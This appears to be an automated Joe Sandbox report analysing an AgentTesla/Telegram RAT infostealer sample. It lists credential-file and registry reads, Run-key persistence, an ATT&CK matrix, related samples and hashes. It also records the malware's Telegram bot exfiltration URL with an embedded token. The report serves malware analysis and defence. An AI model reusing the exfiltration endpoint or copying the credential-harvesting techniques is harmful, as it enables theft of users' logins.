Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f6db50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f43b08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f6db50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	312 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	1 Credentials in Registry	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO54782322024.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.XWorm
PO54782322024.exe	49%	Virustotal		Browse
PO54782322024.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	0%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.ipify.org	RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.5.dr	false	high
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://go.mic	AppPoint.exe, 00000006.00000002.1794954358.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/	RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569681
Start date and time:	2024-12-06 05:50:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO54782322024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@9/12@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 90% Number of executed functions: 131 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AppPoint.exe, PID 5012 because it is empty
Execution Graph export aborted for target AppPoint.exe, PID 6048 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:50:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AppPoint C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
04:51:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AppPoint C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
23:50:57	API Interceptor	12032263x Sleep call for process: RegSvcs.exe modified
23:51:18	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	ozctQoBg1o.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SPhzvjk8wx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Q0Sh31btX8.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	o7H9XLUD9z.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	764GVLyJne.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	lQyRqxe4dt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	G14yjXDQWf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Ti5nuRV7y4.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220
	ozctQoBg1o.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SPhzvjk8wx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Q0Sh31btX8.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	o7H9XLUD9z.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	764GVLyJne.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lQyRqxe4dt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	G14yjXDQWf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ti5nuRV7y4.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
api.ipify.org	https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205
	https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.com	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205
	lC7L7oBBMC.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	0wxckB4Iba.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	OHScaqAPjt.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	8JuGuaUaZP.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	lUy4SKlE6A.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	xFHqehx1tb.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	https://app.peony.ink/view/902b02a8-11f0-4e28-89b1-5318035c10eb	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.12.205
	7Gt3icFvQW.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse	149.154.167.220
	Setup.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220
	ozctQoBg1o.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SPhzvjk8wx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Q0Sh31btX8.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	o7H9XLUD9z.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	764GVLyJne.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lQyRqxe4dt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse	104.21.67.152
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	http://embeds.beehiiv.com/d340f580-bc2a-40d8-9475-db3344c1ebc7	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://online.coverages.best/informations.html?via=PTonRVU7RklJK0ZJTzAmQVk9NllEODZFRTsmNVY4NzFPPEJZQztWVCA=	Get hash	malicious	Unknown	Browse	172.67.165.222
	kqq1aAcVUQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.2.8
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	965600.invoice.exe	Get hash	malicious	FormBook	Browse	149.154.167.220 172.67.74.152
	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse	149.154.167.220 172.67.74.152
	somg.mp3.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.74.152
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220 172.67.74.152
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	149.154.167.220 172.67.74.152
	ozctQoBg1o.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.74.152
	SPhzvjk8wx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.74.152
	Q0Sh31btX8.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.74.152
	o7H9XLUD9z.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.74.152
	764GVLyJne.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse
	RFQ.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	AWB#150332.exe	Get hash	malicious	AgentTesla	Browse
	SOA_9828392091.exe	Get hash	malicious	AgentTesla	Browse
	ngPebbPhbp.exe	Get hash	malicious	RHADAMANTHYS	Browse
	Pi648je050.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	shipping documents.exe	Get hash	malicious	AgentTesla	Browse
	Termination_List_November_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse
	Payment_Advice_USD_48,054.40_.exe	Get hash	malicious	AgentTesla	Browse
	M1Y6kc9FpE.exe	Get hash	malicious	FormBook	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PO54782322024.ex_dcd7f1e6b43c682bb4e94b19bfbd88ec14898fb_b094706f_5b650f41-ff8d-4bf4-b531-59e380231bfd\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.999995050164393
Encrypted:	false
SSDEEP:	192:vjGxcZsli04fxdhaWB2W4zuiFUZ24lO87:vocZi4fxdham2fzuiFUY4lO87
MD5:	0A0A98895C5D5B45ABFEE3C860515A25
SHA1:	405456F76F192B31D35644FC5ECEEE157F56C33B
SHA-256:	074E5901710EA7C01695BF686C129E87B716E75CF5B0BA781DAE2D9681793F3D
SHA-512:	CA8CB2369E134632BD1CDC4336DCD2A63262734EBCB38B941CB827DDE6071CFC949B156116FD68895B2E11194C9CCD354FD019CE012328BED9E44BB163879BB6
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.9.3.4.2.5.4.9.6.3.0.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.9.3.4.2.5.6.3.0.6.8.3.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.6.5.0.f.4.1.-.f.f.8.d.-.4.b.f.4.-.b.5.3.1.-.5.9.e.3.8.0.2.3.1.b.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.0.5.9.6.4.a.-.b.f.7.5.-.4.9.6.d.-.8.c.4.f.-.c.5.c.5.c.3.7.6.c.d.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.P.O.5.4.7.8.2.3.2.2.0.2.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.t.e.k.P.o.r.o.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.b.c.-.0.0.0.1.-.0.0.1.4.-.1.4.1.4.-.1.c.6.e.9.a.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.e.f.1.2.5.9.9.d.9.9.a.2.d.0.3.6.9.8.7.2.0.d.b.2.b.b.4.a.0.8.0.0.0.0.0.0.0.0.!.0.0.0.0.d.c.9.3.e.e.5.0.6.6.5.4.c.5.f.d.1.4.a.6.c.0.c.8.5.1.6.0.9.e.1.d.5.a.a.7.a.c.5.2.!.P.O.5.4.7.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F0B.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Fri Dec 6 04:50:55 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	376108
Entropy (8bit):	3.2912968944137546
Encrypted:	false
SSDEEP:	3072:q8btp9HI2UD3+v9CO4FIUecSrhGmdMPFN1CCq+hqHfNG:q8bVHI283Qh0GrUmdCFFqNFG
MD5:	DB0FACCA9BA220E6BC49968C603C4CFA
SHA1:	60D67C4629C78E06FF88D674423E6CAB70FBADB8
SHA-256:	2758BCD0A68E154018F354209CBD043E03CCC18CF142CEA812BA03A823A6E9B8
SHA-512:	FF659A833903E92852273DC367384B2226C8AB6A8E5415CDFCDE5BE4542E6F7DCDCE0E13CD360561B4D44C0A2486D296258628D92DDFEA5B02846A049DE10778
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Rg....................................$...........(............G..xn..........l.......8...........T............)..d........... 6...........8..............................................................................eJ.......8......Lw......................T.............Rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER41BC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8630
Entropy (8bit):	3.7055343832590135
Encrypted:	false
SSDEEP:	192:R6l7wVeJBdi36Y9iDtagmfZwCCqprB89by9lfxNGm:R6lXJry6YIDtagmf3CByffD
MD5:	8BD415F5F2E7825B5E898A8B0A1EFD8B
SHA1:	56C67BACE491A6DCD9B29B4EA0D03F7F242BBEE7
SHA-256:	F71E3F0F0FA2C888B9A0E2CB8721C713D1E5CD43A6C53922301084562408E3D7
SHA-512:	52BFD71316E28F608DF956FBC2BF98073338D53C642A8125BFA62BFFE649AAD2BD51A286291BEF74E6C108F10FEA6D39D9B21CBFDABDAFDA2600C483B608A990
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4278.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4828
Entropy (8bit):	4.510914800186966
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZOJg771I9M/WpW8VYmYm8M4JwnzpE6FSFyq8v2pE6Tt070f3d:uIjfiI7Xu7VWJwnzaBW2a6Tt070f3d
MD5:	B5E2FAB40A2DD7FE334E2C29D2E0A630
SHA1:	DABAC44FE17EF7A5C0AC45BC5C8C9086B5EC5097
SHA-256:	78796A9E6698790B8DDC745D4C48432A366912E931EF8E0EBBB342096178022C
SHA-512:	93E3C3281AEC8A59BCF79FCCB0B732DCF18A8158DAA19BB1C0A7208005E5B9C0B1A52A65FD54A0B42CBC2D93B0453EB7A0873887D678C5066754C378402E0C88
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppPoint.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
